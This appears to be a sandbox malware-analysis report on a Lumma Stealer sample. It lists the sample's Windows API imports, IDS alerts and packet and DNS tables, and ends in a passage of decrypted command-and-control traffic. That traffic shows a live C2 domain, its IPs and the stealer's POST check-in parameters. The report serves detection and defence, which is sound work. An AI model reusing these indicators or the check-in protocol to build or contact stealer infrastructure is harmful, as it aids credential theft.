ReleaseSemaphore, GlobalMemoryStatus, GetModuleHandleA, GetProcessAffinityMask, CreateThread, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, OutputDebugStringW, GetLocalTime, FlushFileBuffers, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, FormatMessageW, ConnectNamedPipe, GetEnvironmentStringsW, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, lstrcpyW, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, FormatMessageA, QueryPerformanceCounter, QueryPerformanceFrequency, SleepConditionVariableSRW, GetLocaleInfoEx, FindFirstFileExW, MoveFileExW, WakeAllConditionVariable, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetConsoleMode, SetFilePointerEx, GetFileSizeEx, ReadConsoleW, GetTimeZoneInformation, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW, CreateFileW, HeapQueryInformation

imagehlp.dll

SymGetModuleBase, SymFunctionTableAccess, SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, StackWalk

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T08:34:40.217641+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49707	104.21.6.116	443	TCP
2025-01-13T08:34:40.897301+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49707	104.21.6.116	443	TCP
2025-01-13T08:34:40.897301+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49707	104.21.6.116	443	TCP
2025-01-13T08:34:41.565036+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49708	104.21.6.116	443	TCP
2025-01-13T08:34:42.043887+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	49708	104.21.6.116	443	TCP
2025-01-13T08:34:42.043887+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49708	104.21.6.116	443	TCP
2025-01-13T08:34:42.738566+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49709	104.21.6.116	443	TCP
2025-01-13T08:34:43.734959+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49710	104.21.6.116	443	TCP
2025-01-13T08:34:44.283700+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49710	104.21.6.116	443	TCP
2025-01-13T08:34:44.942967+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49711	104.21.6.116	443	TCP
2025-01-13T08:34:47.431490+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49712	104.21.6.116	443	TCP
2025-01-13T08:34:48.815217+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49715	104.21.6.116	443	TCP
2025-01-13T08:34:50.929730+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49719	104.21.6.116	443	TCP
2025-01-13T08:34:51.433133+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49719	104.21.6.116	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 08:34:39.743837118 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:39.743879080 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:39.744007111 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:39.747968912 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:39.747992039 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.217508078 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.217641115 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.224004030 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.224026918 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.224361897 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.278542995 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.468514919 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.468514919 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.468729973 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.897322893 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.897571087 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.897634983 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.909452915 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.909477949 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:40.909491062 CET	49707	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:40.909497023 CET	443	49707	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:41.080955982 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:41.080998898 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:41.081069946 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:41.081696987 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:41.081717014 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:41.564903021 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:41.565036058 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:41.566239119 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:41.566246033 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:41.566734076 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:41.567994118 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:41.568037987 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:41.568093061 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.043822050 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.043888092 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.043911934 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.043952942 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.043970108 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.043977976 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.043992996 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.043998957 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.044024944 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.044034958 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.044118881 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.044316053 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.044322968 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.048738003 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.048799992 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.048806906 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.090174913 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.090183973 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134427071 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134478092 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.134486914 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134593010 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134675980 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.134682894 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134803057 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134845018 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.134865046 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134876013 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.134882927 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.134890079 CET	49708	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.134892941 CET	443	49708	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.274913073 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.274939060 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.275088072 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.275566101 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.275579929 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.738486052 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.738565922 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.739835024 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.739842892 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.740628004 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:42.741915941 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.742037058 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:42.742074966 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.139072895 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.139379978 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.139425993 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.140496969 CET	49709	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.140502930 CET	443	49709	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.269092083 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.269125938 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.269212008 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.269581079 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.269593000 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.734883070 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.734958887 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.736386061 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.736391068 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.736713886 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.737982988 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.738197088 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.738240957 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:43.738461971 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:43.779336929 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.283803940 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.284086943 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.284203053 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.284419060 CET	49710	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.284430027 CET	443	49710	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.478754044 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.478787899 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.478929996 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.479360104 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.479374886 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.942883015 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.942966938 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.944283962 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.944288969 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.944669962 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.946824074 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.946994066 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.947031021 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:44.947083950 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:44.947091103 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:45.843880892 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:45.844127893 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:45.844202995 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:45.844796896 CET	49711	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:45.844809055 CET	443	49711	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:46.952325106 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:46.952387094 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:46.952508926 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:46.952852011 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:46.952872038 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:47.431412935 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:47.431489944 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:47.432924986 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:47.432934999 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:47.433326960 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:47.434623957 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:47.434720993 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:47.434726954 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:47.868236065 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:47.868369102 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:47.868459940 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:47.868635893 CET	49712	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:47.868658066 CET	443	49712	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.344707012 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.344799042 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.344892025 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.345190048 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.345230103 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.815006971 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.815217018 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.816317081 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.816348076 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.816605091 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.823411942 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.824193001 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.824233055 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.824434042 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.824482918 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.824640036 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.824700117 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.824851990 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.824909925 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.825129032 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.825174093 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.825366020 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.825433016 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.825468063 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.825481892 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.825506926 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.825519085 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.825647116 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.825696945 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.825737000 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.825817108 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.825869083 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.834551096 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.834753990 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.834810972 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.834834099 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.834861994 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:48.834933996 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:48.839122057 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.385369062 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.385445118 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.385535955 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.385669947 CET	49715	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.385694981 CET	443	49715	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.465569973 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.465603113 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.465766907 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.466089964 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.466103077 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.929644108 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.929729939 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.930975914 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.931000948 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.931946039 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:50.933188915 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.933190107 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:50.933377028 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:51.433192015 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:51.433470011 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:51.433563948 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:51.433697939 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:51.433706999 CET	443	49719	104.21.6.116	192.168.2.8
Jan 13, 2025 08:34:51.433725119 CET	49719	443	192.168.2.8	104.21.6.116
Jan 13, 2025 08:34:51.433731079 CET	443	49719	104.21.6.116	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 08:34:39.726655006 CET	60336	53	192.168.2.8	1.1.1.1
Jan 13, 2025 08:34:39.739104033 CET	53	60336	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 08:34:39.726655006 CET	192.168.2.8	1.1.1.1	0x47a	Standard query (0)	fixxyplanterv.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 08:34:39.739104033 CET	1.1.1.1	192.168.2.8	0x47a	No error (0)	fixxyplanterv.click		104.21.6.116	A (IP address)	IN (0x0001)	false
Jan 13, 2025 08:34:39.739104033 CET	1.1.1.1	192.168.2.8	0x47a	No error (0)	fixxyplanterv.click		172.67.134.197	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fixxyplanterv.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:40 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fixxyplanterv.click
2025-01-13 07:34:40 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-13 07:34:40 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pffoekvm50i8np91fuma4mtto5; expires=Fri, 09 May 2025 01:21:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FBrJxP3SFF11I2yAAIpm66kV23mP%2Bqo7q%2F%2F0s9OvySoLtv4hLebGY6qubvSSZrRO5KgJautrhHPUKCQGJeQY6pFc%2Fu6As9PTPsV62%2BmFRrF2eF6LUrJAlVwSoDk03%2FyDiIGMGBh5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b48749cc4263-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1571&rtt_var=607&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1778319&cwnd=247&unsent_bytes=0&cid=74869f08dca5464f&ts=699&x=0"
2025-01-13 07:34:40 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-13 07:34:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:41 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: fixxyplanterv.click
2025-01-13 07:34:41 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=ZqchOa--new&j=
2025-01-13 07:34:42 UTC	1127	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gs34rk0eilq3s5h1r6i73927ba; expires=Fri, 09 May 2025 01:21:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8KDdjinJKd9wT1%2BJGH5u5jwWloVofMEiN0rjNk%2Bf5YzKUeorU1HMf5lzExP%2FqSvX9JwH7hKFk0CaNNRRy0WfNKPAsjGsyTrKOtnxcGNC8EhCcvI9uM%2FsSlHZJ1bAWzjt6MujOsQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b48e595a9e16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1793&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=948&delivery_rate=1595628&cwnd=190&unsent_bytes=0&cid=ab50287445fbf399&ts=491&x=0"
2025-01-13 07:34:42 UTC	242	IN	Data Raw: 34 39 39 34 0d 0a 62 41 6d 6b 4f 70 64 65 6b 49 36 54 75 6e 76 58 46 4f 54 6f 73 42 50 6f 36 2b 34 56 35 44 65 76 63 38 62 79 76 68 5a 6b 53 32 55 58 4b 39 49 59 72 57 71 38 72 4f 44 66 57 65 31 67 6c 70 33 56 50 38 71 4b 69 6a 66 65 55 63 34 66 74 5a 65 53 4e 42 49 6d 52 31 5a 76 78 56 62 6b 4f 37 79 73 39 73 4a 5a 37 55 2b 66 79 74 56 39 79 74 48 4d 63 49 35 56 7a 68 2b 6b 6b 39 56 35 46 43 63 47 42 47 58 44 55 76 49 39 39 4f 2f 2f 31 78 36 79 63 59 57 43 33 6e 71 46 67 34 4d 33 79 42 58 4b 43 65 54 49 6e 46 73 42 50 77 51 68 61 4e 64 52 74 53 4f 38 39 62 48 66 46 66 55 75 78 6f 6e 56 63 59 53 4e 69 6e 36 4d 58 38 63 58 70 5a 62 55 5a 67 30 74 44 51 52 72 77 46 50 34 4e 4f 44 69 39 64 41 56 74 48 75 46 79 70 77 78 Data Ascii: 